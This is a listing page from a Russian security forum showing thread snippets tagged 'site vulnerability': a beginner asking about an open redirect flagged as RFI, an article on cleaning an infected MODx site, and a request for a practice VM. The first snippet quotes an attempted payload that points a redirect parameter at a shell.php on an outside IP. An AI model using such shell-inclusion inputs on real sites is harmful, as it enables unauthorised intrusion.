уязвимость сайта
-
G
Подскажите насчет найденной уязвимости
Нашел уязвимость c помощью owasp zap, выдало как RFI, но не уверен, что это так. Параметр страницы: currency_code=&redirect=http%3A%2F%2Fwww.google.com%2F, и редиректит на страницу гугл. Пытался залить шелл: currency_code=&redirect=http://ip/shell.php, файл скачивает, но с помощью Netcat...- gilo20
- Тема
- помощь новичку уязвимость сайта
- Ответы: 2
- Раздел: Безопасность веб-приложений
-
Статья Зараженный MODx и его лечение
Всем добрый вечер! В предыдущей статье я попытался описать общие шаги при заражении сайта. В комментариях пообещал рассмотреть какой-либо конкретный случай. И вот, он мне представился. Конечно, жаль, что это не всеми так любимый Wordpress, но данный вид заражения там я тоже встречал, а процесс...- qwerty_man
- Тема
- modx web уязвимость заражение очистка сайт уязвимость сайта
- Ответы: 0
- Раздел: Мои статьи
-
T
Ищу уязвимую виртуалку с форумом.
Нужна уязвимая виртуальная машина с форумом чтобы потренироваться с заливкой шела через картинку. Искал на Vulnhab и hackme по запросу forum и ничего не нашел. Подскажите пожалуйста где еще или как поискать.- tunialec
- Тема
- веб-шелл виртуальная машина поиск тренировочные ctf площадки уязвимость сайта
- Ответы: 1
- Раздел: Вопросы и Ответы по ИБ (Q&A)